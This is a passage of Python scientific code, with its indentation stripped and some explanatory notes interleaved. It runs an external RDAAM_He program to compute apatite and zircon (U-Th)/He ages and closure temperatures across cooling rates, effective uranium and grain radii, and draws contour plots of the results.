avg_rate_y = np.array([temp_plot_avg, 0.0])
max_rate_x = np.array([time_plot_max, 0.0])
max_rate_y = np.array([temp_plot_max, 0.0])
# Set plot style
plt.style.use(plot_style)
# Create figure
fig, ax = plt.subplots(1, 1, figsize=(6, 5))
if fill_between:
# Define fill ranges
min_rate_filly = np.array([temp_max, 0.0])
min_rate_fillx = np.array([temp_max / cooling_rate_min, 0.0])
max_rate_fillx = np.array([temp_max / cooling_rate_max, 0.0])
# Plot fill
ax.fill_betweenx(
min_rate_filly,
min_rate_fillx,
max_rate_fillx,
color="black",
alpha=0.15,
label="Range of model cooling rates",
)
# Plot lines
ax.plot(min_rate_x, min_rate_y, color="black")
ax.plot(slow_rate_x, slow_rate_y, color="black")
ax.plot(avg_rate_x, avg_rate_y, color="black")
ax.plot(max_rate_x, max_rate_y, color="black")
# Set axis tick label format
ax.xaxis.set_major_formatter(ScalarFormatter())
ax.yaxis.set_major_formatter(ScalarFormatter())
# Set plot x and y range
ax.set_xlim([0.0, time_max])
ax.set_ylim([0.0, temp_max])
# Add axis labels
ax.set_xlabel("Time (Ma)")
ax.set_ylabel("Temperature (°C)")
# Flip axis directions
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
# Use tight layout
plt.tight_layout()
# Save plot if requested
if save_plot:
# Set plot filename and save plot
plot_filename = "time_vs_temp_" + str(plot_dpi) + "dpi." + plot_file_format
plt.savefig(wd_orig + "/" + plot_filename, dpi=plot_dpi)
# Display plot if requested
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
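To make the clipping logic in time_vs_temp concrete, the same min() geometry can be computed standalone for the function's default rates (numbers match the defaults above; the printout itself is illustrative only).

```python
# Each cooling line runs from (t, T) down to the origin; both endpoints are
# clipped to the axis limits, mirroring time_vs_temp above.
temp_max, time_max = 350.0, 50.0
for rate in (0.1, 1.0, 10.0, 100.0):
    t = min(time_max, temp_max / rate)  # Myr needed to cool temp_max, clipped to x-axis
    T = min(temp_max, rate * t)         # temperature reached within the plotted window
    print(f"{rate:6.1f} °C/Myr: line from ({t:.1f} Ma, {T:.1f} °C) to the origin")
```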
# Define function for making contour plot of cooling ages and closure temperatures
def eu_vs_radius(
num_points=21,
cooling_hist_type=1,
temp_max=350.0,
cooling_rate=10.0,
time_hist=[0.0, 10.0, 25.0, 35.0],
temp_hist=[0.0, 75.0, 50.0, 350.0],
ap_u_min=1.0,
ap_u_max=150.0,
zr_u_min=1.0,
zr_u_max=4000.0,
ap_rad_min=40.0,
ap_rad_max=100.0,
zr_rad_min=40.0,
zr_rad_max=100.0,
ap_thorium=0.0,
zr_thorium=0.0,
plot_type=3,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_colormap="plasma",
plot_alpha=1.0,
plot_contour_lines=12,
plot_contour_fills=256,
display_plot=True,
tt_plot=False,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different effective uranium concentrations and
equivalent spherical radii.
Parameters
----------
num_points : int, default=21
Number of points along x and y axes where ages/closure temperatures are
calculated.
NOTE: A value of num_points = 101 was used in the manuscript. It has been
reduced here to make the plotting faster. Set this to 101 to reproduce
the manuscript Figures 2 or 3.
cooling_hist_type : int, default=1
Cooling history type.
1 = constant cooling rate (specify rate as parameter rate)
2 = list of time-temperature points (fill in lists as parameters
time_hist, temp_hist)
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C). Option only for cooling history type 1.
cooling_rate : float, default=10.0
Cooling rate in degrees C per Myr. Option only for cooling history type 1.
time_hist : list of floats or ints, default=[0.0, 10.0, 25.0, 35.0]
Time points defining cooling history in Ma (millions of years ago).
NOTE: Present-day point should be first in list.
Option only for cooling history type 2.
temp_hist : list of floats or ints, default=[0.0, 75.0, 50.0, 350.0]
Temperature points defining cooling history in degrees C.
NOTE: Present-day point should be first in list.
Option only for cooling history type 2.
ap_u_min : float, default=1.0
Minimum apatite uranium concentration in ppm.
ap_u_max : float, default=150.0
Maximum apatite uranium concentration in ppm.
zr_u_min : float, default=1.0
Minimum zircon uranium concentration in ppm.
zr_u_max : float, default=4000.0
Maximum zircon uranium concentration in ppm.
ap_rad_min : float, default=40.0
Minimum apatite equivalent spherical grain radius in micrometers.
ap_rad_max : float, default=100.0
Maximum apatite equivalent spherical grain radius in micrometers.
zr_rad_min : float, default=40.0
Minimum zircon equivalent spherical grain radius in micrometers.
zr_rad_max : float, default=100.0
Maximum zircon equivalent spherical grain radius in micrometers.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
plot_type : int, default=3
eU versus radius plot type.
1 = apatite, 2 = zircon, 3 = both
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot(s) to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_colormap : str, default='plasma'
Colormap used for plotting. See https://matplotlib.org/stable/tutorials/colors/colormaps.html.
plot_alpha : float, default=1.0
Transparency used for plotting fill colors.
plot_contour_lines : int, default=12
Number of contour lines used for plotting.
plot_contour_fills : int, default=256
Number of contour fill colors from the selected colormap.
display_plot : bool, default=True
Flag for whether to display the plot.
tt_plot : bool, default=False
Flag for whether to create/display the time-temperature history plot.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Define cooling history using constant cooling rate
if cooling_hist_type == 1:
# Define time and temperature histories
start_time = temp_max / cooling_rate
time_hist = [0.0, start_time]
temp_hist = [0.0, temp_max]
# Option 2: Define time-temperature history using list of tT points
elif cooling_hist_type == 2:
pass
# Raise error if an unsupported value is given for cooling_hist_type
else:
raise ValueError("Bad value for cooling_hist_type. Should be 1 or 2.")
# Create arrays of U concentrations
ap_u = np.linspace(ap_u_min, ap_u_max, num_points)
zr_u = np.linspace(zr_u_min, zr_u_max, num_points)
# Create grain radius arrays
ap_rad = np.linspace(ap_rad_min, ap_rad_max, num_points)
zr_rad = np.linspace(zr_rad_min, zr_rad_max, num_points)
# Calculate effective uranium
ap_eu = calc_eu(ap_u, ap_thorium)
zr_eu = calc_eu(zr_u, zr_thorium)
# Calculate total number of models
total_models = len(ap_u) * len(ap_rad)
# Screen output info
if plot_type == 1:
model_type = "apatite age/Tc (eU vs. radius)"
elif plot_type == 2:
model_type = "zircon age/Tc (eU vs. radius)"
elif plot_type == 3:
model_type = "apatite/zircon age/Tc (eU vs. radius)"
else:
raise ValueError("Bad value for plot_type. Should be 1, 2, or 3.")
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type < 3:
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
else:
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
# Set plot loop variables
ap_x = ap_eu
ap_y = ap_rad
zr_x = zr_eu
zr_y = zr_rad
# Create lists for storing closure temperatures, ages
ahe_tc_list = []
ahe_age_list = []
ap_x_list = []
ap_y_list = []
zhe_tc_list = []
zhe_age_list = []
zr_x_list = []
zr_y_list = []
# Write cooling history points to file
with open(tt_file, "w") as f:
for i in range(len(time_hist)):
f.write(f"{time_hist[i]:.4f},{temp_hist[i]:.1f}\n")
# Echo total model run time and cooling rate
if verbose and cooling_hist_type == 1:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {cooling_rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plotables
model_count = 0
for i in range(len(ap_x)):
for j in range(len(ap_y)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
ap_uranium = ap_u[i]
zr_uranium = zr_u[i]
ap_radius = ap_rad[j]
zr_radius = zr_rad[j]
ap_x_list.append(ap_uranium)
zr_x_list.append(zr_uranium)
ap_y_list.append(ap_radius)
zr_y_list.append(zr_radius)
# Calculate (U-Th)/He ages
command = (
rdaam_command
+ " "
+ tt_file
+ " "
+ str(ap_radius)
+ " "
+ str(ap_uranium)
+ " "
+ str(ap_thorium)
+ " "
+ str(zr_radius)
+ " "
+ str(zr_uranium)
+ " "
+ str(zr_thorium)
)
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d(time_hist, temp_hist)
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures, ages to lists
ahe_tc_list.append(ahe_tc)
ahe_age_list.append(float(corr_ahe_age))
zhe_tc_list.append(zhe_tc)
zhe_age_list.append(float(corr_zhe_age))
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
# Clean up Tt file
os.remove(tt_file)
# Apatite eU versus radius
if plot_type == 1:
# Create age contour lines
ap_contours_age = ax[0].tricontour(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0].clabel(ap_contours_age)
# Create age contour fill
ap_contourf_age = ax[0].tricontourf(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
ap_contours_tc = ax[1].tricontour(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="black",
)
# Add closure temperature contour labels
ax[1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc = ax[1].tricontourf(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc.collections:
c.set_edgecolor("face")
# Zircon eU versus radius
elif plot_type == 2:
# Create age contour lines
zr_contours_age = ax[0].tricontour(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0].clabel(zr_contours_age)
# Create age contour fill
zr_contourf_age = ax[0].tricontourf(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
zr_contours_tc = ax[1].tricontour(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc = ax[1].tricontourf(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc.collections:
c.set_edgecolor("face")
# Apatite and zircon eU versus radius
else:
# Create age contour lines
ap_contours_age = ax[0][0].tricontour(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[0][0].clabel(ap_contours_age)
# Create age contour fill
ap_contourf_age = ax[0][0].tricontourf(
ap_x_list,
ap_y_list,
ahe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
ap_contours_tc = ax[0][1].tricontour(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[0][1].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc = ax[0][1].tricontourf(
ap_x_list,
ap_y_list,
ahe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc.collections:
c.set_edgecolor("face")
# Create age contour lines
zr_contours_age = ax[1][0].tricontour(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add age contour labels
ax[1][0].clabel(zr_contours_age)
# Create age contour fill
zr_contourf_age = ax[1][0].tricontourf(
zr_x_list,
zr_y_list,
zhe_age_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_age.collections:
c.set_edgecolor("face")
# Create closure temperature contour lines
zr_contours_tc = ax[1][1].tricontour(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Add closure temperature contour labels
ax[1][1].clabel(zr_contours_tc)
# Create closure temperature contour fill
zr_contourf_tc = ax[1][1].tricontourf(
zr_x_list,
zr_y_list,
zhe_tc_list,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in zr_contourf_tc.collections:
c.set_edgecolor("face")
# Format plot
# Apatite eU versus radius
if plot_type == 1:
ax[0].set_title("Apatite (U-Th)/He age [Ma]")
ax[1].set_title("Apatite (U-Th)/He closure temperature [°C]")
# Zircon eU versus radius
elif plot_type == 2:
ax[0].set_title("Zircon (U-Th)/He age [Ma]")
ax[1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_title("Apatite (U-Th)/He age [Ma]")
ax[0][1].set_title("Apatite (U-Th)/He closure temperature [°C]")
ax[1][0].set_title("Zircon (U-Th)/He age [Ma]")
ax[1][1].set_title("Zircon (U-Th)/He closure temperature [°C]")
# Apatite or Zircon eU versus radius
if plot_type < 3:
ax[0].set_xlabel("Effective uranium (ppm)")
ax[1].set_xlabel("Effective uranium (ppm)")
ax[0].set_ylabel("Equivalent spherical radius (µm)")
ax[1].set_ylabel("Equivalent spherical radius (µm)")
# Apatite and zircon eU versus radius
else:
ax[0][0].set_xlabel("Effective uranium (ppm)")
ax[0][1].set_xlabel("Effective uranium (ppm)")
ax[0][0].set_ylabel("Equivalent spherical radius (µm)")
ax[0][1].set_ylabel("Equivalent spherical radius (µm)")
ax[1][0].set_xlabel("Effective uranium (ppm)")
ax[1][1].set_xlabel("Effective uranium (ppm)")
ax[1][0].set_ylabel("Equivalent spherical radius (µm)")
ax[1][1].set_ylabel("Equivalent spherical radius (µm)")
# Use tight layout for subplots
plt.tight_layout()
# Save plot if desired
if save_plot:
# Set file name prefix
plot_filename = "eu_vs_radius"
# Define plot filename based on type of plot and save plot
if plot_type == 1:
plot_savename = (
plot_filename + "_apatite_" + str(plot_dpi) + "dpi." + plot_file_format
)
elif plot_type == 2:
plot_savename = (
plot_filename + "_zircon_" + str(plot_dpi) + "dpi." + plot_file_format
)
else:
plot_savename = (
plot_filename
+ "_apatite_zircon_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename, dpi=plot_dpi)
# Display plot if desired
if display_plot:
plt.show()
# Create tT history plot if requested
if tt_plot:
# Create figure 2
fig2, ax2 = plt.subplots(1, 1, figsize=(6, 5))
# Plot tT history
ax2.plot(time_hist, temp_hist, color="black")
# Set plot x and y range
ax2.set_xlim([0.0, max(time_hist)])
ax2.set_ylim([0.0, max(temp_hist)])
# Add axis labels
ax2.set_xlabel("Time (Ma)")
ax2.set_ylabel("Temperature (°C)")
# Add title
ax2.set_title("Time-temperature history")
# Flip axis directions
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
# Use tight layout
plt.tight_layout()
# Save plot if desired
if save_plot:
# Define plot filename and save plot
plot_savename2 = (
plot_filename
+ "_tT_history_"
+ str(plot_dpi)
+ "dpi."
+ plot_file_format
)
plt.savefig(wd_orig + "/" + plot_savename2, dpi=plot_dpi)
# Display plot if desired
if display_plot:
plt.show()
# Revert to original working directory
os.chdir(wd_orig)
return None
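The closure temperatures in eu_vs_radius come from interpolating each cooling age onto the time-temperature history. For a linear history this reduces to Tc = cooling rate × age, which can be checked with numpy's np.interp (equivalent to the scipy interp1d call for this piecewise-linear case; the history and age below are hypothetical).

```python
import numpy as np

# Hypothetical linear cooling history: 350 °C at 35 Ma cooling to 0 °C today,
# i.e. a constant 10 °C/Myr, as produced when cooling_hist_type == 1.
time_hist = [0.0, 35.0]
temp_hist = [0.0, 350.0]

# A corrected AHe age of 6.5 Ma maps to the temperature the sample was at then.
ahe_tc = np.interp(6.5, time_hist, temp_hist)
print(float(ahe_tc))  # 65.0
```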
# Define function for making contour plots of ages/closure temperatures versus cooling rate, radius, and eU
def rate_vs_radius_eu(
num_points=21,
cooling_rate_min=0.1,
cooling_rate_max=100.0,
temp_max=350.0,
ap_u_min=1.0,
ap_u_max=150.0,
ap_u_ref=10.0,
zr_u_min=1.0,
zr_u_max=4000.0,
zr_u_ref=100.0,
ap_rad_min=40.0,
ap_rad_max=100.0,
ap_rad_ref=45.0,
zr_rad_min=40.0,
zr_rad_max=100.0,
zr_rad_ref=60.0,
ap_thorium=0.0,
zr_thorium=0.0,
plot_type=3,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-colorblind",
plot_colormap="plasma",
plot_alpha=1.0,
plot_contour_lines=12,
plot_contour_fills=256,
display_plot=True,
verbose=False,
use_widget=False,
):
"""
Calculates thermochronometer ages and closure temperatures for different cooling rates, effective uranium
concentrations, and equivalent spherical radii.
Parameters
----------
num_points : int, default=21
Number of points along x and y axes where ages/closure temperatures are
calculated.
NOTE: A value of num_points = 101 was used in the manuscript. It has been
reduced here to make the plotting faster. Set this to 101 to reproduce
the manuscript Figure 4.
cooling_rate_min : float, default=0.1
Minimum cooling rate in degrees C per Myr.
cooling_rate_max : float, default=100.0
Maximum cooling rate in degrees C per Myr.
temp_max : float, default=350.0
Max temperature for cooling history (in degrees C).
ap_u_min : float, default=1.0
Minimum apatite uranium concentration in ppm.
ap_u_max : float, default=150.0
Maximum apatite uranium concentration in ppm.
ap_u_ref : float, default=10.0
Apatite uranium concentration in ppm for rate versus radius plot.
zr_u_min : float, default=1.0
Minimum zircon uranium concentration in ppm.
zr_u_max : float, default=4000.0
Maximum zircon uranium concentration in ppm.
zr_u_ref : float, default=100.0
Zircon uranium concentration in ppm for rate versus radius plot.
ap_rad_min : float, default=40.0
Minimum apatite equivalent spherical grain radius in micrometers.
ap_rad_max : float, default=100.0
Maximum apatite equivalent spherical grain radius in micrometers.
ap_rad_ref : float, default=45.0
Apatite equivalent spherical grain radius in micrometers for rate versus eU plot.
zr_rad_min : float, default=40.0
Minimum zircon equivalent spherical grain radius in micrometers.
zr_rad_max : float, default=100.0
Maximum zircon equivalent spherical grain radius in micrometers.
zr_rad_ref : float, default=60.0
Zircon equivalent spherical grain radius in micrometers for rate versus eU plot.
ap_thorium : float, default=0.0
Apatite thorium concentration in ppm.
zr_thorium : float, default=0.0
Zircon thorium concentration in ppm.
plot_type : int, default=3
Cooling rate versus eU/radius.
1 = apatite, 2 = zircon, 3 = both
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-colorblind'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
plot_colormap : str, default='plasma'
Colormap used for plotting. See https://matplotlib.org/stable/tutorials/colors/colormaps.html.
plot_alpha : float, default=1.0
Transparency used for plotting fill colors.
plot_contour_lines : int, default=12
Number of contour lines used for plotting.
plot_contour_fills : int, default=256
Number of contour fill colors from the selected colormap.
display_plot : bool, default=True
Flag for whether to display the plot.
verbose : bool, default=False
Enable/disable verbose output.
use_widget : bool, default=False
Enable/disable IPython progress bar widget. Disabled for command-line usage.
Returns
-------
None
"""
# Check to see whether ipywidgets and IPython are available for widget use
# If not, disable widgets and display a warning
if use_widget:
try:
import ipywidgets as widgets
except ModuleNotFoundError:
print("Warning: ipywidgets module not found. Disabling graphical progress bar.")
use_widget = False
if use_widget:
try:
from IPython.display import display
except ModuleNotFoundError:
print(
"Warning: IPython.display module not found. Disabling graphical progress bar."
)
use_widget = False
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Create arrays of U concentrations
ap_u = np.linspace(ap_u_min, ap_u_max, num_points)
zr_u = np.linspace(zr_u_min, zr_u_max, num_points)
# Create grain radius arrays
ap_rad = np.linspace(ap_rad_min, ap_rad_max, num_points)
zr_rad = np.linspace(zr_rad_min, zr_rad_max, num_points)
# Create cooling rate array
rates = np.logspace(
start=np.log10(cooling_rate_min),
stop=np.log10(cooling_rate_max),
num=num_points,
)
# Calculate effective uranium
ap_eu = calc_eu(ap_u, ap_thorium)
zr_eu = calc_eu(zr_u, zr_thorium)
# Total number of models
total_models = len(ap_u) * len(rates) + len(ap_rad) * len(rates)
# Screen output info
if plot_type == 1:
model_type = "apatite age/Tc (cooling rate vs. radius/eU)"
elif plot_type == 2:
model_type = "zircon age/Tc (cooling rate vs. radius/eU)"
elif plot_type == 3:
model_type = "apatite/zircon age/Tc (cooling rate vs. radius/eU)"
else:
raise ValueError("Bad value for parameter plot_type. Must be 1, 2, or 3.")
# Define time-temperature history filename
tt_file = "simple_time_temp.txt"
# Get age calculation executable(s) to use
rdaam_command = get_tc_exec("RDAAM_He")
# Set plot style
plt.style.use(plot_style)
# Create figure
if plot_type < 3:
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
else:
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
# Set plot loop variables
ap_x1 = rates
ap_y1 = ap_rad
zr_x1 = rates
zr_y1 = zr_rad
ap_x2 = rates
ap_y2 = ap_eu
zr_x2 = rates
zr_y2 = zr_eu
# Create lists for storing closure temperatures, ages
ahe_tc_list1 = []
ahe_tc_list2 = []
ap_x_list1 = []
ap_y_list1 = []
ap_x_list2 = []
ap_y_list2 = []
zhe_tc_list1 = []
zhe_tc_list2 = []
zr_x_list1 = []
zr_y_list1 = []
zr_x_list2 = []
zr_y_list2 = []
# Create visual progress bar, if enabled
if use_widget and not verbose:
s = widgets.IntProgress(
value=0,
min=0,
max=total_models,
description="Calculating:",
bar_style="", # 'success', 'info', 'warning', 'danger' or ''
style={"bar_color": "#ff6666"},
orientation="horizontal",
)
display(s)
# Loop over plotables - loop 1: rate versus radius
model_count = 0
for i in range(len(ap_x1)):
for j in range(len(ap_y1)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * model_count / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
rate = rates[i]
ap_radius = ap_rad[j]
zr_radius = zr_rad[j]
ap_uranium = ap_u_ref
zr_uranium = zr_u_ref
ap_x_list1.append(rate)
zr_x_list1.append(rate)
ap_y_list1.append(ap_radius)
zr_y_list1.append(zr_radius)
# Write synthetic cooling history points to file
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Screen output
if verbose:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
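Each iteration writes a two-point linear cooling history: 0 °C at the present day and temp_max at start_time Ma. A minimal helper capturing just that step (the helper name and the temporary-file usage are illustrative, not part of the original code):

```python
import tempfile


def write_cooling_history(path, temp_max, rate):
    """Write a two-point time-temperature history: (0 Ma, 0 C) -> (start_time Ma, temp_max C)."""
    start_time = temp_max / rate  # Myr needed to cool to 0 C at the given rate
    with open(path, "w") as f:
        f.write("0.0,0.0\n")
        f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
    return start_time


with tempfile.NamedTemporaryFile("r", suffix=".txt") as tmp:
    start_time = write_cooling_history(tmp.name, temp_max=350.0, rate=10.0)
    print(start_time)  # 35.0 -- cooling 350 C at 10 C/Myr takes 35 Myr
    print(tmp.read())  # "0.0,0.0" then "35.0000,350.0"
```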
# Calculate (U-Th)/He ages
command = f"{rdaam_command} {tt_file} {ap_radius} {ap_uranium} {ap_thorium} {zr_radius} {zr_uranium} {zr_thorium}"
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures to lists
ahe_tc_list1.append(ahe_tc)
zhe_tc_list1.append(zhe_tc)
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
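Because the synthetic history cools linearly, the closure temperature is just a linear map from the predicted age onto the time-temperature line, which is all the interp1d call does. A dependency-free equivalent for illustration (the function name is hypothetical):

```python
def closure_temperature(age, start_time, temp_max):
    """Linearly map a cooling age (Ma) onto the history (0 Ma, 0 C) -> (start_time Ma, temp_max C)."""
    return age / start_time * temp_max


# A 7 Ma age on a 35 Myr history that cooled from 350 C closes at 70 C
print(closure_temperature(7.0, 35.0, 350.0))  # 70.0
```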
# Loop over plotables - loop 2: rate versus eU
for i in range(len(ap_x2)):
for j in range(len(ap_y2)):
model_count += 1
if not verbose:
if use_widget:
s.value = model_count
else:
print(
f"Calculating {model_type} - {int(round(100 * (model_count) / total_models)):3d}% ({model_count:5d} / {total_models:5d})\r",
end="",
)
# Define parameters for this iteration
rate = rates[i]
ap_radius = ap_rad_ref
zr_radius = zr_rad_ref
ap_uranium = ap_u[j]
zr_uranium = zr_u[j]
ap_x_list2.append(rate)
zr_x_list2.append(rate)
ap_y_list2.append(ap_uranium)
zr_y_list2.append(zr_uranium)
# Write synthetic cooling history points to file
start_time = temp_max / rate
with open(tt_file, "w") as f:
f.write("0.0,0.0\n")
f.write("{0:.4f},{1:.1f}".format(start_time, temp_max))
# Screen output
if verbose:
print(
f"Cooling from {temp_max:.1f}°C at a rate of {rate:.1f} °C/Myr will require {start_time:.2f} million years"
)
# Calculate (U-Th)/He ages
command = f"{rdaam_command} {tt_file} {ap_radius} {ap_uranium} {ap_thorium} {zr_radius} {zr_uranium} {zr_thorium}"
p = subprocess.Popen(
command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
# Parse output for ages
stdout = p.stdout.readlines()
corr_ahe_age = stdout[0].split()[7].decode("UTF-8")
corr_zhe_age = stdout[1].split()[7].decode("UTF-8")
# Find closure temperatures from cooling ages and thermal history
tc_interp = interp1d([0.0, start_time], [0.0, temp_max])
ahe_tc = tc_interp(float(corr_ahe_age))
zhe_tc = tc_interp(float(corr_zhe_age))
# Add closure temperatures to lists
ahe_tc_list2.append(ahe_tc)
zhe_tc_list2.append(zhe_tc)
if verbose:
print(
f"AHe: {float(corr_ahe_age):.2f} Ma (Tc: {ahe_tc:.1f}°C); ZHe: {float(corr_zhe_age):.2f} Ma (Tc: {zhe_tc:.1f}°C)"
)
# Clean up temporary tt file
os.remove(tt_file)
# Plot only values for apatite (U-Th)/He
if plot_type == 1:
# --- Apatite cooling rate versus radius ---
# Create closure temperature contour lines
ap_contours_tc = ax[0].tricontour(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
ax[0].set_xscale("log")
# Add closure temperature contour labels
ax[0].clabel(ap_contours_tc)
# Create closure temperature contour fill
ap_contourf_tc1 = ax[0].tricontourf(
ap_x_list1,
ap_y_list1,
ahe_tc_list1,
plot_contour_fills,
cmap=plot_colormap,
alpha=plot_alpha,
)
# This is the fix for the white lines between contour levels
for c in ap_contourf_tc1.collections:
c.set_edgecolor("face")
# --- Apatite cooling rate versus eU plot ---
# Create closure temperature contour lines
ap_contours_tc = ax[1].tricontour(
ap_x_list2,
ap_y_list2,
ahe_tc_list2,
plot_contour_lines,
linewidths=0.5,
colors="k",
)
# Use log x-axis scaling
